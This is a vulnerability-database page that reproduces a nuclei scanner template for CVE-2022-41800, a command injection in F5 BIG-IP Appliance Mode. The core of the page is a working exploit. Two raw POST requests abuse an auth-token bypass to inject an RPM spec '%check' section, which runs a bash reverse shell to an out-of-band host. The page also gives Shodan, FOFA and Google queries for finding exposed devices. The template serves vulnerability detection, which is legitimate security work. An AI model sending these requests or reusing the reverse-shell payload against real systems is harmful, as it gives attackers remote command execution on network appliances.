Lucene search
K

F5 BIG-IP Appliance Mode - Command Injection

🗓️ 11 Jul 2026 02:59:56Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 71 Views

F5 BIG-IP Appliance Mode - Auth Bypass & Command Injection CVE-2022-41800 allows admin to bypass Appliance mode restrictions, execute remote commands, and makes authorization bypass possible. Severity: Hig

Related
Refs
Code
id: CVE-2022-41800

info:
  name: F5 BIG-IP Appliance Mode - Command Injection
  author: dwisiswant0
  severity: high
  description: |
    When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
  remediation: |
    Apply security patches from F5 Networks as outlined in K97843387 and ensure Appliance mode restrictions are properly enforced.
  impact: |
    A successful exploit can allow the attacker to execute remote commands on server using authorization bypass (CVE-2022-1388).
  reference:
    - https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis
    - https://support.f5.com/csp/article/K97843387
    - https://support.f5.com/csp/article/K13325942
    - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
    - https://nvd.nist.gov/vuln/detail/cve-2022-41800
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 8.7
    cve-id: CVE-2022-41800
    cwe-id: CWE-77
    epss-score: 0.62406
    epss-percentile: 0.99085
    cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: f5
    product: big-ip_access_policy_manager
    shodan-query:
      - http.title:"big-ip®-+redirect" +"server"
      - http.html:"big-ip apm"
    fofa-query:
      - body="big-ip apm"
      - title="big-ip®-+redirect" +"server"
    google-query: intitle:"big-ip®-+redirect" +"server"
  tags: cve,cve2022,rce,f5,bigip,instrusive,vkev,vuln

variables:
  auth: "admin:{{rand_text_alpha(1)}}"
  rand_app: "{{to_lower(rand_text_alpha(6))}}"
  rand_ver: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
  rand_rel: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"

http:
  - raw:
      - |
        POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
        Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host

        {
          "specFileData": {
            "name": "{{rand_app}}",
            "srcBasePath": "/tmp",
            "version": "{{rand_ver}}",
            "release": "{{rand_rel}}",
            "description": "\n\n%check\nbash -i >& /dev/tcp/{{interactsh-url}}/{{rand_text_numeric(4)}} 0>&1",
            "summary": "{{to_lower(rand_text_alphanumeric(10))}}"
          }
        }

      - |
        POST /mgmt/shared/iapp/build-package HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json
        Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host

        {
          "state": {},
          "appName": "{{rand_app}}",
          "packageDirectory": "/tmp",
          "specFilePath": "{{spec}}",
          "force": true
        }

    extractors:
      - type: json
        part: body
        name: spec
        json:
          - ".specFilePath"
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "RUN_BUILD_RPM_TASK"
          - "shared:iapp:build-package:buildrpmtaskstate"
# digest: 4a0a0047304502202af8f944604b4969f3e30ed20f79e4a05489ce0a7ccba87a7a99debf9b00b065022100cd97da8b7fde728fe940eb378a18eeb2cbdec176888c910f125738cd44ad2ea9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 27.5
CVSS 3.19.8
EPSS0.99956
SSVC
71